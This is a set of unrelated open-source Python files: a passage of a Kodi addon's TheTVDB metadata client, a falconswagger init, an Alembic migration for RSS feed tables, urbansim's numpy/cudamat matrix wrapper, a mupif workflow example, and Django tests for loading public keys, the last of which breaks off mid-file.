% buscando logger.debug(msg) @classmethod def __check_token(cls): # logger.info() if TOKEN == "": cls.__login() else: # si la fecha no se corresponde con la actual llamamos a refresh_token, ya que el token expira en 24 horas from time import gmtime, strftime current_date = strftime("%Y-%m-%d", gmtime()) if config.get_setting("tvdb_token_date", "") != current_date: # si se ha renovado el token grabamos la nueva fecha if cls.__refresh_token(): config.set_setting("tvdb_token_date", current_date) @staticmethod def __login(): # logger.info() global TOKEN apikey = "106B699FDC04301C" url = HOST + "/login" params = {"apikey": apikey} try: req = urllib2.Request(url, data=jsontools.dump(params), headers=DEFAULT_HEADERS) response = urllib2.urlopen(req) html = response.read() response.close() except Exception, ex: message = "An exception of type %s occured. Arguments:\n%s" % (type(ex).__name__, repr(ex.args)) logger.error("error en: %s" % message) else: dict_html = jsontools.load(html) # logger.debug("dict_html %s" % dict_html) if "token" in dict_html: token = dict_html["token"] DEFAULT_HEADERS["Authorization"] = "Bearer " + token TOKEN = config.set_setting("tvdb_token", token) @classmethod def __refresh_token(cls): # logger.info() global TOKEN is_success = False url = HOST + "/refresh_token" try: req = urllib2.Request(url, headers=DEFAULT_HEADERS) response = urllib2.urlopen(req) html = response.read() response.close() except urllib2.HTTPError, err: logger.error("err.code es %s" % err.code) # si hay error 401 es que el token se ha pasado de tiempo y tenemos que volver a llamar a login if err.code == 401: cls.__login() else: raise except Exception, ex: message = "An exception of type %s occured. Arguments:\n%s" % (type(ex).__name__, repr(ex.args)) logger.error("error en: %s" % message) else: dict_html = jsontools.load(html) # logger.error("tokencito %s" % dict_html) if "token" in dict_html: token = dict_html["token"] DEFAULT_HEADERS["Authorization"] = "Bearer " + token TOKEN = config.set_setting("tvdb_token", token) is_success = True return is_success def get_info_episode(self, _id, season=1, episode=1, lang=DEFAULT_LANG, id_episode=None): """ Devuelve los datos de un episodio. @param _id: identificador de la serie @type _id: str @param season: numero de temporada [por defecto = 1] @type season: int @param episode: numero de episodio [por defecto = 1] @type episode: int @param lang: codigo de idioma para buscar @type lang: str @param id_episode: codigo del episodio. 
@type id_episode: int @rtype: dict @return: "data": { "id": 0, "airedSeason": 0, "airedEpisodeNumber": 0, "episodeName": "string", "firstAired": "string", "guestStars": [ "string" ], "director": "string", # deprecated "directors": [ "string" ], "writers": [ "string" ], "overview": "string", "productionCode": "string", "showUrl": "string", "lastUpdated": 0, "dvdDiscid": "string", "dvdSeason": 0, "dvdEpisodeNumber": 0, "dvdChapter": 0, "absoluteNumber": 0, "filename": "string", "seriesId": "string", "lastUpdatedBy": "string", "airsAfterSeason": 0, "airsBeforeSeason": 0, "airsBeforeEpisode": 0, "thumbAuthor": 0, "thumbAdded": "string", "thumbWidth": "string", "thumbHeight": "string", "imdbId": "string", "siteRating": 0, "siteRatingCount": 0 }, "errors": { "invalidFilters": [ "string" ], "invalidLanguage": "string", "invalidQueryParams": [ "string" ] } """ logger.info() if id_episode and self.episodes.get(id_episode): return self.episodes.get(id_episode) params = {"airedSeason": "%s" % season, "airedEpisode": "%s" % episode} try: import urllib params = urllib.urlencode(params) url = HOST + "/series/%s/episodes/query?%s" % (_id, params) DEFAULT_HEADERS["Accept-Language"] = lang logger.debug("url: %s, \nheaders: %s" % (url, DEFAULT_HEADERS)) req = urllib2.Request(url, headers=DEFAULT_HEADERS) response = urllib2.urlopen(req) html = response.read() response.close() except Exception, ex: message = "An exception of type %s occured. Arguments:\n%s" % (type(ex).__name__, repr(ex.args)) logger.error("error en: %s" % message) else: dict_html = jsontools.load(html) if "data" in dict_html and "id" in dict_html["data"][0]: self.get_episode_by_id(dict_html["data"][0]["id"], lang) return dict_html["data"] def get_list_episodes(self, _id, page=1): """ Devuelve el listado de episodios de una serie. @param _id: identificador de la serie @type _id: str @param page: numero de pagina a buscar [por defecto = 1] @type page: int @rtype: dict @return: { "links": { "first": 0, "last": 0, "next": 0, "previous": 0 }, "data": [ { "absoluteNumber": 0, "airedEpisodeNumber": 0, "airedSeason": 0, "dvdEpisodeNumber": 0, "dvdSeason": 0, "episodeName": "string", "id": 0, "overview": "string", "firstAired": "string", "lastUpdated": 0 } ], "errors": { "invalidFilters": [ "string" ], "invalidLanguage": "string", "invalidQueryParams": [ "string" ] } } """ logger.info() try: url = HOST + "/series/%s/episodes?page=%s" % (_id, page) logger.debug("url: %s, \nheaders: %s" % (url, DEFAULT_HEADERS)) req = urllib2.Request(url, headers=DEFAULT_HEADERS) response = urllib2.urlopen(req) html = response.read() response.close() except Exception, ex: message = "An exception of type %s occured. 
Arguments:\n%s" % (type(ex).__name__, repr(ex.args)) logger.error("error en: %s" % message) else: self.list_episodes[page] = jsontools.load(html) # logger.info("dict_html %s" % self.list_episodes) return self.list_episodes[page] def get_episode_by_id(self, _id, lang=DEFAULT_LANG, semaforo=None): """ Obtiene los datos de un episodio @param _id: identificador del episodio @type _id: str @param lang: código de idioma @param semaforo: semaforo para multihilos @type semaforo: threading.Semaphore @type lang: str @rtype: dict @return: { "data": { "id": 0, "airedSeason": 0, "airedEpisodeNumber": 0, "episodeName": "string", "firstAired": "string", "guestStars": [ "string" ], "director": "string", "directors": [ "string" ], "writers": [ "string" ], "overview": "string", "productionCode": "string", "showUrl": "string", "lastUpdated": 0, "dvdDiscid": "string", "dvdSeason": 0, "dvdEpisodeNumber": 0, "dvdChapter": 0, "absoluteNumber": 0, "filename": "string", "seriesId": "string", "lastUpdatedBy": "string", "airsAfterSeason": 0, "airsBeforeSeason": 0, "airsBeforeEpisode": 0, "thumbAuthor": 0, "thumbAdded": "string", "thumbWidth": "string", "thumbHeight": "string", "imdbId": "string", "siteRating": 0, "siteRatingCount": 0 }, "errors": { "invalidFilters": [ "string" ], "invalidLanguage": "string", "invalidQueryParams": [ "string" ] } } """ if semaforo: semaforo.acquire() logger.info() url = HOST + "/episodes/%s" % _id try: DEFAULT_HEADERS["Accept-Language"] = lang logger.debug("url: %s, \nheaders: %s" % (url, DEFAULT_HEADERS)) req = urllib2.Request(url, headers=DEFAULT_HEADERS) response = urllib2.urlopen(req) html = response.read() response.close() except Exception, ex: if type(ex) == urllib2.HTTPError: logger.debug("code es %s " % ex.code) message = "An exception of type %s occured. Arguments:\n%s" % (type(ex).__name__, repr(ex.args)) logger.error("error en: %s" % message) else: dict_html = jsontools.load(html) dict_html = dict_html.pop("data") logger.info("dict_html %s" % dict_html) self.episodes[_id] = dict_html if semaforo: semaforo.release() def __search(self, name, imdb_id, zap2it_id, lang=DEFAULT_LANG): """ Busca una serie a través de una serie de parámetros. @param name: nombre a buscar @type name: str @param imdb_id: codigo identificativo de imdb @type imdb_id: str @param zap2it_id: codigo identificativo de zap2it @type zap2it_id: str @param lang: código de idioma @type lang: str data:{ "aliases": [ "string" ], "banner": "string", "firstAired": "string", "id": 0, "network": "string", "overview": "string", "seriesName": "string", "status": "string" } """ logger.info() try: params = {} if name: params["name"] = name elif imdb_id: params["imdbId"] = imdb_id elif zap2it_id: params["zap2itId"] = zap2it_id import urllib params = urllib.urlencode(params) DEFAULT_HEADERS["Accept-Language"] = lang url = HOST + "/search/series?%s" % params logger.debug("url: %s, \nheaders: %s" % (url, DEFAULT_HEADERS)) req = urllib2.Request(url, headers=DEFAULT_HEADERS) response = urllib2.urlopen(req) html = response.read() response.close() except Exception, ex: if type(ex) == urllib2.HTTPError: logger.debug("code es %s " % ex.code) message = "An exception of type %s occured. 
Arguments:\n%s" % (type(ex).__name__, repr(ex.args)) logger.error("error en: %s" % message) else: dict_html = jsontools.load(html) if "errors" in dict_html and "invalidLanguage" in dict_html["errors"]: # no hay información en idioma por defecto return else: resultado = dict_html["data"] # todo revisar if len(resultado) > 1: index = 0 else: index = 0 logger.debug("resultado %s" % resultado) self.list_results = resultado self.result = resultado[index] def __get_by_id(self, _id, lang=DEFAULT_LANG, from_get_list=False): """ Obtiene los datos de una serie por identificador. @param _id: código de la serie @type _id: str @param lang: código de idioma @type lang: str @rtype: dict @return: { "data": { "id": 0, "seriesName": "string", "aliases": [ "string" ], "banner": "string", "seriesId": 0, "status": "string", "firstAired": "string", "network": "string", "networkId": "string", "runtime": "string", "genre": [ "string" ], "overview": "string", "lastUpdated": 0, "airsDayOfWeek": "string", "airsTime": "string", "rating": "string", "imdbId": "string", "zap2itId": "string", "added": "string", "siteRating": 0, "siteRatingCount": 0 }, "errors": { "invalidFilters": [ "string" ], "invalidLanguage": "string", "invalidQueryParams": [ "string" ] } } """ logger.info() resultado = {} url = HOST + "/series/%s" % _id try: DEFAULT_HEADERS["Accept-Language"] = lang req = urllib2.Request(url, headers=DEFAULT_HEADERS) logger.debug("url: %s, \nheaders: %s" % (url, DEFAULT_HEADERS)) response = urllib2.urlopen(req) html = response.read() response.close() except Exception, ex: if type(ex) == urllib2.HTTPError: logger.debug("code es %s " % ex.code) message = "An exception of type %s occured. Arguments:\n%s" % (type(ex).__name__, repr(ex.args)) logger.error("error en: %s" % message) else: dict_html = jsontools.load(html) if "errors" in dict_html and "invalidLanguage" in dict_html["errors"]: return {} else: resultado1 = dict_html["data"] if not resultado1 and from_get_list: return self.__get_by_id(_id, "en") logger.debug("resultado %s" % dict_html) resultado2 = {"image_poster": [{'keyType': 'poster', 'fileName': 'posters/%s-1.jpg' % _id}]} resultado3 = {"image_fanart": [{'keyType': 'fanart', 'fileName': 'fanart/original/%s-1.jpg' % _id}]} resultado = resultado1.copy() resultado.update(resultado2) resultado.update(resultado3) logger.debug("resultado total %s" % resultado) self.list_results = [resultado] self.result = resultado return resultado def get_images(self, _id, image="poster", season=1, lang="en"): """ Obtiene un tipo de imagen para una serie para un idioma. @param _id: identificador de la serie @type _id: str @param image: codigo de busqueda, ["poster" (por defecto), "fanart", "season"] @type image: str @type season: numero de temporada @param lang: código de idioma para el que se busca @type lang: str @return: diccionario con el tipo de imagenes elegidas. 
@rtype: dict """ logger.info() if self.result.get('image_season_%s' % season): return self.result['image_season_%s' % season] params = {} if image == "poster": params["keyType"] = "poster" elif image == "fanart": params["keyType"] = "fanart" params["subKey"] = "graphical" elif image == "season": params["keyType"] = "season" params["subKey"] = "%s" % season image += "_%s" % season try: import urllib params = urllib.urlencode(params) DEFAULT_HEADERS["Accept-Language"] = lang url = HOST + "/series/%s/images/query?%s" % (_id, params) logger.debug("url: %s, \nheaders: %s" % (url, DEFAULT_HEADERS)) req = urllib2.Request(url, headers=DEFAULT_HEADERS) response = urllib2.urlopen(req) html = response.read() response.close() except Exception, ex: message = "An exception of type %s occured. Arguments:\n%s" % (type(ex).__name__, repr(ex.args)) logger.error("error en: %s" % message) return {} else: dict_html = jsontools.load(html) dict_html["image_" + image] = dict_html.pop("data") self.result.update(dict_html) return dict_html def get_tvshow_cast(self, _id, lang=DEFAULT_LANG): """ obtiene el casting de una serie @param _id: codigo de la serie @type _id: str @param lang: codigo idioma para buscar @type lang: str @return: diccionario con los actores @rtype: dict """ logger.info() url = HOST + "/series/%s/actors" % _id DEFAULT_HEADERS["Accept-Language"] = lang logger.debug("url: %s, \nheaders: %s" % (url, DEFAULT_HEADERS)) req = urllib2.Request(url, headers=DEFAULT_HEADERS) response = urllib2.urlopen(req) html = response.read() response.close() dict_html = jsontools.load(html) dict_html["cast"] = dict_html.pop("data") self.result.update(dict_html) def get_id(self): """ @return: Devuelve el identificador Tvdb de la serie cargada o una cadena vacia en caso de que no hubiese nada cargado. Se puede utilizar este metodo para saber si una busqueda ha dado resultado o no. @rtype: str """ return str(self.result.get('id', "")) def get_list_results(self): """ Devuelve los resultados encontramos para una serie. @rtype: list @return: lista de resultados """ logger.info() list_results = [] # TODO revisar condicion # si tenemos un resultado y tiene seriesName, ya tenemos la info de la serie, no hace falta volver a buscar if len(self.list_results) == 1 and "seriesName" in self.result: list_results.append(self.result) info_load = True else: import threading semaforo = threading.Semaphore(20) l_hilo = list() r_list = list() def sub_thread(_id, i): semaforo.acquire() ret = self.__get_by_id(_id, DEFAULT_LANG, True) semaforo.release() r_list.append((ret, i)) for index, e in enumerate(self.list_results): t = threading.Thread(target=sub_thread, args=(e["id"], index)) t.start() l_hilo.append(t) for x in l_hilo: x.join() r_list.sort(key=lambda i: i[1]) list_results = [ii[0] for ii in r_list] info_load = False return list_results, info_load def get_infoLabels(self, infoLabels=None, origen=None): """ @param infoLabels: Informacion extra de la pelicula, serie, temporada o capitulo. @type infoLabels: dict @param origen: Diccionario origen de donde se obtiene los infoLabels, por omision self.result @type origen: dict @return: Devuelve la informacion extra obtenida del objeto actual. Si se paso el parametro infoLables, el valor devuelto sera el leido como parametro debidamente actualizado. 
@rtype: dict """ # TODO revisar if infoLabels: # logger.debug("es instancia de infoLabels") ret_infoLabels = InfoLabels(infoLabels) else: # logger.debug("NO ES instancia de infoLabels") ret_infoLabels = InfoLabels() # fix ret_infoLabels['mediatype'] = 'tvshow' # Iniciar listados l_castandrole = ret_infoLabels.get('castandrole', []) # logger.debug("self.result %s" % self.result) if not origen: origen = self.result # todo revisar # if 'credits' in origen.keys(): # dic_origen_credits = origen['credits'] # origen['credits_cast'] = dic_origen_credits.get('cast', []) # origen['credits_crew'] = dic_origen_credits.get('crew', []) # del origen['credits'] items = origen.items() for k, v in items: if not v: continue if k == 'overview': ret_infoLabels['plot'] = v elif k == 'runtime': ret_infoLabels['duration'] = int(v) * 60 elif k == 'firstAired': ret_infoLabels['year'] = int(v[:4]) ret_infoLabels['premiered'] = v.split("-")[2] + "/" + v.split("-")[1] + "/" + v.split("-")[0] # todo revisar # elif k == 'original_title' or k == 'original_name': # ret_infoLabels['originaltitle'] = v elif k == 'siteRating': ret_infoLabels['rating'] = float(v) elif k == 'siteRatingCount': ret_infoLabels['votes'] = v elif k == 'status': # se traduce los estados de una serie ret_infoLabels['status'] = DICT_STATUS.get(v, v) # no soy partidario de poner la cadena como studio pero es como lo hace el scraper de manera genérica elif k == 'network': ret_infoLabels['studio'] = v elif k == 'image_poster': # obtenemos la primera imagen de la lista ret_infoLabels['thumbnail'] = HOST_IMAGE + v[0]['fileName'] elif k == 'image_fanart': # obtenemos la primera imagen de la lista ret_infoLabels['fanart'] = HOST_IMAGE + v[0]['fileName'] # # no disponemos de la imagen de fondo # elif k == 'banner': # ret_infoLabels['fanart'] = HOST_IMAGE + v elif k == 'id': ret_infoLabels['tvdb_id'] = v elif k == 'imdbId': ret_infoLabels['imdb_id'] = v # no se muestra # ret_infoLabels['code'] = v elif k in "rating": # traducimos la clasificación por edades (content rating system) ret_infoLabels['mpaa'] = DICT_MPAA.get(v, v) elif k in "genre": genre_list = "" for index, i in enumerate(v): if index > 0: genre_list += ", " # traducimos los generos genre_list += DICT_GENRE.get(i, i) ret_infoLabels['genre'] = genre_list elif k == 'seriesName': # or k == 'name' or k == 'title': # if len(origen.get('aliases', [])) > 0: # ret_infoLabels['title'] = v + " " + origen.get('aliases', [''])[0] # else: # ret_infoLabels['title'] = v # logger.info("el titulo es %s " % ret_infoLabels['title']) ret_infoLabels['title'] = v elif k == 'cast': dic_aux = dict((name, character) for (name, character) in l_castandrole) l_castandrole.extend([(p['name'], p['role']) for p in v if p['name'] not in dic_aux.keys()]) else: logger.debug("Atributos no añadidos: %s=%s" % (k, v)) pass # Ordenar las listas y convertirlas en str si es necesario if l_castandrole: ret_infoLabels['castandrole'] = l_castandrole logger.debug("ret_infoLabels %s" % ret_infoLabels) return ret_infoLabels
pitunti/alfaPitunti
plugin.video.alfa/core/tvdb.py
Python
gpl-3.0
40,140
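The tvdb.py scraper above reshuffles TheTVDB's ISO "firstAired" dates (YYYY-MM-DD) into the DD/MM/YYYY form it stores in infoLabels['premiered'] by splitting on "-" and reordering the pieces. A minimal, self-contained sketch of that step (the date value is made up):

first_aired = "2017-02-28"  # hypothetical value returned by the API
premiered = "%s/%s/%s" % tuple(reversed(first_aired.split("-")))
print(premiered)  # -> 28/02/2017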
from falconswagger.swagger_api import SwaggerAPI from falconswagger.models.http import ModelHttpMeta
dutradda/falcon-swagger
falconswagger/__init__.py
Python
mit
100
"""RSS moar columns Revision ID: 1dc0fe0d793f Revises: 3389071120cb Create Date: 2017-02-28 06:49:26.443860 """ # revision identifiers, used by Alembic. revision = '1dc0fe0d793f' down_revision = '3389071120cb' branch_labels = None depends_on = None # Patch in knowledge of the citext type, so it reflects properly. import citext from sqlalchemy.dialects.postgresql.base import ischema_names ischema_names['citext'] = citext.CIText from sqlalchemy.dialects import postgresql import sqlalchemy as sa import sqlalchemy_utils import urllib.parse from alembic import op from flask_sqlalchemy import _SessionSignalEvents import sqlalchemy as sa from sqlalchemy import event from sqlalchemy.ext.declarative import declarative_base from sqlalchemy.orm import sessionmaker, Session as BaseSession, relationship from sqlalchemy import Table from sqlalchemy import Column from sqlalchemy import BigInteger from sqlalchemy import Integer from sqlalchemy import Text from sqlalchemy import Float from sqlalchemy import Boolean from sqlalchemy import DateTime from sqlalchemy import ForeignKey from sqlalchemy import PrimaryKeyConstraint from sqlalchemy import UniqueConstraint from sqlalchemy.orm import relationship from sqlalchemy.schema import UniqueConstraint Session = sessionmaker() Base = declarative_base() class RssFeedPost(Base): __tablename__ = 'feed_pages' id = Column(BigInteger, primary_key=True) feed_id = Column(BigInteger, ForeignKey('rss_parser_funcs.id'), index = True, nullable=False) srcname = Column(Text, nullable=False, index=True) feedurl = Column(Text, nullable=False, index=True) class RssFeedUrlMapper(Base): __versioned__ = {} __tablename__ = 'rss_parser_feed_name_lut' name = 'rss_parser_feed_name_lut' id = Column(BigInteger, primary_key = True, index = True) feed_netloc = Column(Text, nullable = False, index = True) feed_url = Column(Text, nullable = False, index = True) feed_id = Column(BigInteger, ForeignKey('rss_parser_funcs.id'), nullable = False, index = True) __table_args__ = ( UniqueConstraint('feed_netloc', 'feed_id'), ) class RssFeedEntry(Base): __versioned__ = {} __tablename__ = 'rss_parser_funcs' name = 'rss_parser_funcs' id = Column(BigInteger, primary_key = True, index = True) version = Column(Integer, default='0') feed_name = Column(Text, nullable = False, index = True, unique = True) enabled = Column(Boolean, default=True) func = Column(Text) urls = relationship('RssFeedUrlMapper', backref='rss_parser_funcs') releases = relationship('RssFeedPost', backref='rss_parser_funcs')
fake-name/ReadableWebProxy
alembic/versions/00039_1dc0fe0d793f_rss_moar_columns.py
Python
bsd-3-clause
2,769
from __future__ import division import numpy as np from numpy.linalg import inv from numpy.core.umath_tests import inner1d def initialize_gpu(): from cudamat import cudamat as cm global cm # this class wraps matrix operations so that you can switch between numpy # and cuda operations cm.cuda_set_device(0) cm.init() # the keyword "inplace" for all of these functions re-uses the memory wherever # possible use this if you don't want allocate more memory on the gpu which can # be expensive, and don't need to reuse the matrix being transformed def random(size, typ='numpy'): return PMAT(np.random.uniform(size=size).reshape(1, size)) class PMAT: def __init__(self, mat, typ='numpy'): self.typ = typ if (type(mat) != np.ndarray and type(mat) != np.matrix and type(mat) != np.float64): self.typ = 'cuda' self.mat = mat elif typ == 'numpy': self.mat = mat elif typ == 'cuda': self.mat = cm.CUDAMatrix(mat) def multiply(self, mat): if self.typ == 'numpy': return PMAT(np.dot(self.mat, mat.mat)) elif self.typ == 'cuda': return PMAT(cm.dot(self.mat, mat.mat)) def exp(self, inplace=False): if self.typ == 'numpy': return PMAT(np.exp(self.mat)) elif self.typ == 'cuda': if inplace: self.mat = cm.exp(self.mat) return self else: target = cm.empty(self.mat.shape) cm.exp(self.mat, target=target) return PMAT(target) def log(self, inplace=False): if self.typ == 'numpy': return PMAT(np.log(self.mat)) elif self.typ == 'cuda': if inplace: self.mat = cm.log(self.mat) return self else: target = cm.empty(self.mat.shape) cm.log(self.mat, target=target) return PMAT(target) # find the first positive value along an axis - for use in doing random # choice def firstpositive(self, axis): if self.typ == 'numpy': return PMAT(np.argmax((self.mat + 1.0).astype('i4'), axis=axis)) def cumsum(self, axis): if self.typ == 'numpy': return PMAT(np.cumsum(self.mat, axis=axis)) # elif self.typ == 'cuda': # return PMAT(misc.cumsum(self.mat,axis=axis)) def argmax(self, axis): if self.typ == 'numpy': return PMAT(np.argmax(self.mat, axis=axis)) def transpose(self): if self.typ == 'numpy': return PMAT(np.transpose(self.mat)) # WARNING, always in place elif self.typ == 'cuda': self.mat.transpose() def reshape(self, rowlen, collen): if rowlen == -1: rowlen = self.size() // collen if collen == -1: collen = self.size() // rowlen if self.typ == 'numpy': self.mat = np.reshape(self.mat, (rowlen, collen), order='F') return self # WARNING, always in place elif self.typ == 'cuda': self.mat = self.mat.reshape((rowlen, collen)) return self def size(self): if self.typ == 'numpy': return self.mat.size elif self.typ == 'cuda': return self.mat.shape[0] * self.mat.shape[1] def sum(self, axis, shorten=0): if self.typ == 'numpy': # this is weird, but a numpy sum return flat array sometimes and # we want 2D matrices # return PMAT(np.sum(self.mat,axis=axis,dtype="float64")) if axis == 0: return PMAT(np.reshape( np.sum(self.mat, axis=axis, dtype="float64"), (1, -1))) if axis == 1: return PMAT(np.reshape( np.sum(self.mat, axis=axis, dtype="float64"), (-1, 1))) # return # PMAT(np.array(np.matrix(self.mat).sum(axis=axis,dtype="float64"))) elif self.typ == 'cuda': return PMAT(self.mat.sum(axis=axis)) def get_mat(self): if self.typ == 'numpy': return self.mat if self.typ == 'cuda': return self.mat.asarray() def shape(self): return self.mat.shape def subtract(self, mat, inplace=False): if self.typ == 'numpy': return PMAT(self.mat - mat.mat) if self.typ == 'cuda': if inplace: self.mat.subtract(mat.mat) return self else: target = cm.empty(self.mat.shape) 
self.mat.subtract(mat.mat, target=target) return PMAT(target) def divide_by_row(self, rowvec, inplace=False): if self.typ == 'numpy': return PMAT(self.mat / rowvec.mat) elif self.typ == 'cuda': if inplace: rowvec.mat.reciprocal() self.mat.mult_by_row(rowvec.mat) return self else: target = cm.empty(self.mat.shape) rowvec.mat.reciprocal() self.mat.mult_by_row(rowvec.mat, target=target) return PMAT(target) def multiply_by_row(self, rowvec, inplace=False): if self.typ == 'numpy': return PMAT(self.mat * rowvec.mat) elif self.typ == 'cuda': if inplace: self.mat.mult_by_row(rowvec.mat) return self else: target = cm.empty(self.mat.shape) self.mat.mult_by_row(rowvec.mat, target=target) return PMAT(target) def multiply_by_col(self, colvec, inplace=False): if self.typ == 'numpy': return PMAT(self.mat * colvec.mat) elif self.typ == 'cuda': if inplace: self.mat.mult_by_col(colvec.mat) return self else: target = cm.empty(self.mat.shape) self.mat.mult_by_col(colvec.mat, target=target) return PMAT(target) def add_row_vec(self, rowvec, inplace=False): if self.typ == 'numpy': return PMAT(self.mat + rowvec.mat) elif self.typ == 'cuda': if inplace: self.mat.add_row_vec(rowvec.mat) return self else: target = cm.empty(self.mat.shape) self.mat.add_row_vec(rowvec.mat, target=target) return PMAT(target) def add_col_vec(self, colvec, inplace=False): if self.typ == 'numpy': return PMAT(self.mat + colvec.mat) elif self.typ == 'cuda': if inplace: self.mat.add_col_vec(colvec.mat) return self else: target = cm.empty(self.mat.shape) self.mat.add_col_vec(colvec.mat, target=target) return PMAT(target) def element_multiply(self, mat, inplace=False): if self.typ == 'numpy': return PMAT(self.mat * mat.mat) elif self.typ == 'cuda': if inplace: self.mat = self.mat.mult(mat.mat) return self else: target = cm.empty(self.mat.shape) self.mat.mult(mat.mat, target=target) return PMAT(target) def element_add(self, mat, inplace=False): if self.typ == 'numpy': return PMAT(self.mat + mat.mat) elif self.typ == 'cuda': if inplace: self.mat = self.mat.add(mat.mat) return self else: target = cm.empty(self.mat.shape) self.mat.add(mat.mat, target=target) return PMAT(target) def clamptomin(self, val): assert self.typ == "numpy" self.mat[self.mat < val] = val def inftoval(self, val): assert self.typ == "numpy" self.mat[np.isinf(self.mat)] = val def nantoval(self, val): assert self.typ == "numpy" self.mat[np.isnan(self.mat)] = val def __str__(self): if self.typ == 'numpy': return str(self.mat) elif self.typ == 'cuda': return str(self.get_mat())
apdjustino/urbansim
urbansim/urbanchoice/pmat.py
Python
bsd-3-clause
8,585
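A short usage sketch of the PMAT wrapper above with the default numpy backend (matrix values are arbitrary; the cuda path would additionally need initialize_gpu() and a working cudamat install):

import numpy as np
from urbansim.urbanchoice.pmat import PMAT  # import path taken from the sample's metadata

a = PMAT(np.array([[1.0, 2.0], [3.0, 4.0]]))
b = PMAT(np.array([[0.5, 0.0], [0.0, 0.5]]))
prod = a.multiply(b)          # matrix product (np.dot) on the numpy backend
col_sums = prod.sum(axis=0)   # PMAT.sum keeps the result 2-D as a 1xN row vector
print(prod.get_mat())
print(col_sums.get_mat())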
import sys import Pyro5 sys.path.extend(['..', '../..']) import logging log = logging.getLogger() import threading import mupif as mp threading.current_thread().setName('ex10-main') @Pyro5.api.expose class Workflow10(mp.workflow.Workflow): def __init__(self, metadata={}): MD = { "ClassName": "Workflow10", "ModuleName": "main.py", "Name": "Example10 workflow", "ID": "workflow_10", "Description": "Calculates cummulative time times 2 using a simple PBS model", "Inputs": [ mp.workflow.workflow_input_targetTime_metadata, mp.workflow.workflow_input_dt_metadata ], "Outputs": [ # duplicates outputs of the contained model {'Type': 'mupif.Property', 'Type_ID': 'mupif.DataID.PID_Time', 'Name': 'Cummulated time value', 'Description': 'Cummulative time', 'Units': 's'} ], } mp.workflow.Workflow.__init__(self, metadata=MD) self.updateMetadata(metadata) self.daemon = None self.ns = None self.model_1_jobman = None self.model_1 = None def initialize(self, workdir='', metadata={}, validateMetaData=True, **kwargs): self.updateMetadata(dictionary=metadata) execMD = { 'Execution': { 'ID': self.getMetadata('Execution.ID'), 'Use_case_ID': self.getMetadata('Execution.Use_case_ID'), 'Task_ID': self.getMetadata('Execution.Task_ID') } } self.ns = mp.pyroutil.connectNameserver() self.daemon = mp.pyroutil.getDaemon(self.ns) # initialization code of model_1 self.model_1_jobman = mp.pyroutil.connectJobManager(self.ns, 'Mupif.JobManager@Example10') try: self.model_1 = mp.pyroutil.allocateApplicationWithJobManager(ns=self.ns, jobMan=self.model_1_jobman) log.info(self.model_1) except Exception as e: log.exception(e) self.model_1.initialize(workdir='', metadata=execMD) self.registerModel(self.model_1, "model_1") mp.Workflow.initialize(self, workdir=workdir, metadata={}, validateMetaData=validateMetaData, **kwargs) def get(self, objectTypeID, time=None, objectID=""): return self.model_1.get(objectTypeID=objectTypeID, time=time, objectID=objectID) def set(self, obj, objectID=""): super().set(obj=obj, objectID=objectID) def terminate(self): self.model_1.terminate() def finishStep(self, tstep): self.model_1.finishStep(tstep) def solveStep(self, tstep, stageID=0, runInBackground=False): time_property = mp.ConstantProperty(value=tstep.getTime().inUnitsOf(mp.U.s), propID=mp.DataID.PID_Time, valueType=mp.ValueType.Scalar, unit=mp.U.s, time=None) self.model_1.set(obj=time_property, objectID=1) self.model_1.solveStep(tstep=tstep, stageID=stageID, runInBackground=runInBackground) def getCriticalTimeStep(self): return self.model_1.getCriticalTimeStep() if __name__ == '__main__': # inputs targetTime = 2. dt = 1. # input properties param_targetTime = mp.ConstantProperty(value=targetTime, propID=mp.DataID.PID_Time, valueType=mp.ValueType.Scalar, unit=mp.U.s, time=None) param_dt = mp.ConstantProperty(value=dt, propID=mp.DataID.PID_Time, valueType=mp.ValueType.Scalar, unit=mp.U.s, time=None) workflow = Workflow10() # these metadata are supposed to be filled before execution md = { 'Execution': { 'ID': 'N/A', 'Use_case_ID': 'N/A', 'Task_ID': 'N/A' } } workflow.initialize(metadata=md) # set the input values defining targetTime and dt of the simulation workflow.set(param_targetTime, 'targetTime') workflow.set(param_dt, 'dt') workflow.solve() res_property = workflow.get(mp.DataID.PID_Time) value_result = res_property.inUnitsOf(mp.U.s).getValue() workflow.terminate() print('Simulation has finished.') # testing part print(value_result) if value_result is not None and abs(value_result - 6.) 
<= 1.e-4: print("Test OK") log.info("Test OK") else: print("Test FAILED") log.error("Test FAILED")
mupif/mupif
examples/Example10-jobMan-distrib-PBS/main.py
Python
lgpl-3.0
4,352
from django.test import TestCase from unittest import mock from .. import keys from . import data import os.path class PublicKeyTest(TestCase): def test_load_pem_rsa(self): exc, key = keys.PublicKey.load_serialized_public_key(data.PEM_PUBLIC_RSA) self.assertIsNone(exc) self.assertIsInstance(key, keys.RSAPublicKey) def test_load_pem_ed25519(self): exc, key = keys.PublicKey.load_serialized_public_key(data.PEM_PUBLIC_ED25519) self.assertIsNone(exc) self.assertIsInstance(key, keys.Ed25519PublicKey) def test_load_openssh_rsa(self): exc, key = keys.PublicKey.load_serialized_public_key(data.OPENSSH_RSA) self.assertIsNone(exc) self.assertIsInstance(key, keys.RSAPublicKey) def test_load_openssh_ed25519(self): exc, key = keys.PublicKey.load_serialized_public_key(data.OPENSSH_ED25519) self.assertIsNone(exc) self.assertIsInstance(key, keys.Ed25519PublicKey) def test_load_invalid_pem_rsa(self): exc, key = keys.PublicKey.load_serialized_public_key(data.PEM_PUBLIC_RSA_INVALID) self.assertIsInstance(exc, Exception) self.assertIsNone(key) def test_load_invalid_pem_ed25519(self): exc, key = keys.PublicKey.load_serialized_public_key(data.PEM_PUBLIC_ED25519_INVALID) self.assertIsInstance(exc, Exception) self.assertIsNone(key) def test_load_invalid_openssh_rsa(self): exc, key = keys.PublicKey.load_serialized_public_key(data.OPENSSH_RSA_INVALID) self.assertIsInstance(exc, Exception) self.assertIsNone(key) def test_load_invalid_openssh_ed25519(self): exc, key = keys.PublicKey.load_serialized_public_key(data.OPENSSH_ED25519_INVALID) self.assertIsInstance(exc, Exception) self.assertIsNone(key) def test_rsa_as_pem(self): exc, key = keys.PublicKey.load_serialized_public_key(data.PEM_PUBLIC_RSA) self.assertIsNone(exc) pem = key.as_pem.decode().strip().split('\n') self.assertEqual(pem[0], '-----BEGIN PUBLIC KEY-----') self.assertEqual(pem[-1], '-----END PUBLIC KEY-----') def test_ed25519_as_pem(self): exc, key = keys.PublicKey.load_serialized_public_key(data.PEM_PUBLIC_ED25519) self.assertIsNone(exc) pem = key.as_pem.decode().strip().split('\n') self.assertEqual(pem[0], '-----BEGIN PUBLIC KEY-----') 